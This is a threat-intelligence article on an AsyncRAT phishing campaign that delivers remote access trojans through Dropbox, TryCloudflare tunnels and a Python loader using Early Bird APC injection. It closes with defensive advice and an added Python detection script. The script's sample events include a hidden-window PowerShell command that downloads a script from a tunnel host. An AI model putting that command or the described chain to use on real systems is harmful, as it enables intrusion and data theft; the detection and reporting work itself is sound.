AsyncRAT Campaign Exploits Cloudflare Tunnels and Python for Malware Delivery
Key Takeaways
- A new AsyncRAT campaign leverages legitimate cloud services like Dropbox and Cloudflare Tunnels for stealthy malware delivery.
- The attack chain begins with phishing emails containing fake invoice lures, leading to a multi-stage infection process.
- Attackers use Python scripts and a bundled interpreter to inject various remote access trojans (RATs), including AsyncRAT, VenomRAT, and XWorm, into legitimate Windows processes.
- The campaign highlights a growing trend of threat actors abusing trusted cloud infrastructure to bypass traditional security defenses.
A sophisticated new campaign employing the AsyncRAT remote access trojan has emerged, utilizing a clever tactic to evade detection: leveraging trusted cloud services. Instead of relying on easily identifiable malicious infrastructure, the attackers are delivering their payload via Dropbox links and Cloudflare Tunnels (specifically the TryCloudflare service). This method allows the malware to bypass many conventional security tools that typically do not flag legitimate cloud platforms as threats.
AsyncRAT itself is a well-known and persistent threat, notorious for its capabilities in espionage, data theft, and remote command execution. What distinguishes this current wave of attacks is its innovative delivery mechanism, which incorporates legitimate cloud infrastructure and a concealed Python package to deploy the final malicious payload.
Security researchers at Forcepoint said in a report that this AsyncRAT campaign bears a strong resemblance to an earlier attack they analyzed in August. The Forcepoint team emphasized that the continued abuse of TryCloudflare validates predictions from their 2025 Future Insights report, which forecast an increase in threat actors misusing legitimate infrastructure to remain undetected.
AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts
The infection sequence typically begins with a phishing email designed to look like an invoice. These emails feature a button, often in German, prompting the recipient to download an invoice from Dropbox. Clicking this link initiates a series of downloads that ultimately installs AsyncRAT, while simultaneously displaying a convincing fake PDF invoice to the victim, minimizing suspicion.
The initial Dropbox URL leads to a ZIP file. Inside this ZIP file is an internet shortcut (.URL) that, when opened, connects to a specific TryCloudflare subdomain: hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/. This subdomain then hosts an LNK file.
Executing the LNK file triggers a PowerShell command that downloads a JavaScript file from the same Cloudflare tunnel. This JavaScript file, upon deobfuscation, proceeds to fetch a batch file from the identical infrastructure.
The batch file, heavily obfuscated, orchestrates the core malicious activity. It serves the fake PDF invoice as a distraction, while in the background, it downloads a second ZIP file containing a Python package. The script also performs a check for an existing Python installation; if Python is not found, it deploys a bundled interpreter.
Within this Python package, most of the files are benign setup components. However, a critical element is a script named load.py, which, alongside five binary files, is responsible for executing the actual attack.
Python Loader And Final Payload
When load.py is executed, it leverages the Python ctypes library, which allows it to interact directly with Windows operating system functions. This access is used to allocate memory, create threads, and inject shellcode—classic steps in a process injection attack.
The campaign employs an “Early Bird APC Queue injection” technique. This method involves injecting malicious code into a newly created process before its main thread begins execution, making it significantly harder for antivirus and endpoint detection and response (EDR) solutions to detect and prevent. The specific payload injected varies depending on which binary file is processed:
- One binary injects VenomRAT into the legitimate notepad.exe process.
- Another binary injects XWorm.
- The remaining binary files inject AsyncRAT shellcode into explorer.exe.
All variants of the injected malware establish communication with the same command and control (C2) servers over different ports (3232 and 4056).
Forcepoint reports that its customers are protected at multiple stages of this attack chain, with their solutions capable of blocking the initial phishing attachments, redirect URLs, dropper files, and C2 communication. Furthermore, Forcepoint’s Next-Generation Firewall (NGFW) products are configured by default to terminate LNK file transfers and suspicious PowerShell connections, offering an additional layer of defense.
What You Should Do
- Exercise extreme caution with unexpected emails, especially those related to invoices or urgent downloads, even if they appear to come from known entities.
- Avoid opening ZIP attachments or shortcut files (.LNK, .URL) from unknown or suspicious senders.
- Enable PowerShell logging on endpoints to enhance visibility and aid in early detection of malicious activity.
- Implement robust email filtering and security solutions that can detect and block malicious links and attachments before they reach end-users.
- Ensure endpoint detection and response (EDR) solutions are up-to-date and configured to detect process injection techniques and unusual process behavior.
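The delivery chain described above (a .URL shortcut pointing at a TryCloudflare subdomain, then PowerShell, a JavaScript stager, a batch file, and finally a Python loader whose injected hosts beacon on ports 3232 and 4056) can be turned into concrete detection logic. The following is an added example, not code from the article or from Forcepoint: it parses the INI-style .URL shortcut to check its target, and applies three chain-specific rules to Sysmon-style process and network events. The shortcut content, the event records and the tunnel hostname `example-tunnel.trycloudflare.com` are constructed sample data, not the campaign's real indicators.

```python
"""Detection helpers for the AsyncRAT/TryCloudflare delivery chain (added example)."""
import re
from configparser import ConfigParser
from typing import Dict, List

# TryCloudflare quick tunnels use a random-word subdomain under trycloudflare.com.
TRYCLOUDFLARE_RE = re.compile(r"https?://[a-z0-9-]+\.trycloudflare\.com\b", re.I)
# Script hosts the chain passes through (PowerShell -> JavaScript -> batch).
STAGERS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Processes the report names as injection targets; neither normally opens sockets.
INJECTION_HOSTS = {"notepad.exe", "explorer.exe"}
# C2 ports quoted in the report.
C2_PORTS = {3232, 4056}


def parse_internet_shortcut(text: str) -> str:
    """Return the URL= target of a .URL internet shortcut (an INI file), or '' if absent."""
    cp = ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except Exception:  # malformed shortcut: treat as no target
        return ""
    return cp.get("InternetShortcut", "URL", fallback="").strip()


def shortcut_points_to_trycloudflare(text: str) -> bool:
    """True when the shortcut's target is a TryCloudflare tunnel hostname."""
    return bool(TRYCLOUDFLARE_RE.search(parse_internet_shortcut(text)))


def evaluate_events(events: List[Dict]) -> List[str]:
    """Apply three rules to Sysmon-style events and return the findings raised.

    Rule 1: a script host fetching from a TryCloudflare tunnel.
    Rule 2: python.exe running load.py, spawned by the batch stage (cmd.exe).
    Rule 3: notepad.exe/explorer.exe connecting to a reported C2 port.
    """
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        if ev.get("type") == "process":
            cmd = ev.get("cmdline", "")
            parent = ev.get("parent", "").lower()
            if image in STAGERS and TRYCLOUDFLARE_RE.search(cmd):
                findings.append(f"stager_fetch_from_trycloudflare:{image}")
            if image in ("python.exe", "pythonw.exe") and "load.py" in cmd.lower() \
                    and parent == "cmd.exe":
                findings.append("python_loader_spawned_by_batch")
        elif ev.get("type") == "network":
            if image in INJECTION_HOSTS and ev.get("dport") in C2_PORTS:
                findings.append(f"injection_host_beacon:{image}:{ev['dport']}")
    return findings


def chain_detected(events: List[Dict]) -> bool:
    """Escalate when at least two distinct stages of the chain fire on one host."""
    stages = {f.split(":")[0] for f in evaluate_events(events)}
    return len(stages) >= 2


# Constructed sample data (not real campaign artifacts).
SAMPLE_SHORTCUT = (
    "[InternetShortcut]\r\n"
    "URL=https://example-tunnel.trycloudflare.com/DE/\r\n"
)
SAMPLE_EVENTS = [
    {"type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell -w hidden -c \"iwr https://example-tunnel.trycloudflare.com/DE/s.js "
                "-OutFile $env:TEMP\\s.js\""},
    {"type": "process", "image": "cmd.exe", "parent": "wscript.exe",
     "cmdline": "cmd /c C:\\Users\\u\\AppData\\Local\\Temp\\inv.bat"},
    {"type": "process", "image": "python.exe", "parent": "cmd.exe",
     "cmdline": "python.exe C:\\Users\\u\\AppData\\Local\\Temp\\pkg\\load.py"},
    {"type": "network", "image": "notepad.exe", "dst": "203.0.113.10", "dport": 3232},
    {"type": "network", "image": "chrome.exe", "dst": "203.0.113.20", "dport": 443},
]

if __name__ == "__main__":
    print("shortcut suspicious:", shortcut_points_to_trycloudflare(SAMPLE_SHORTCUT))
    for finding in evaluate_events(SAMPLE_EVENTS):
        print("finding:", finding)
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

The rules are deliberately narrow so each one maps to a stage the report describes; in practice the network rule would be fed from Sysmon event 3 (or EDR equivalents) and the process rules from event 1 with PowerShell script block logging enabled, as the recommendations above suggest. Requiring two distinct stages before escalating keeps a lone developer's legitimate TryCloudflare test from paging anyone.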
Threat actors are increasingly exploiting low-cost, disposable cloud infrastructure to deploy information stealers and remote access trojans, making it crucial for organizations to adapt their defenses to this evolving landscape. This trend allows attackers to circumvent traditional blocklists and maintain persistence.
Indicators of Compromise (IoCs):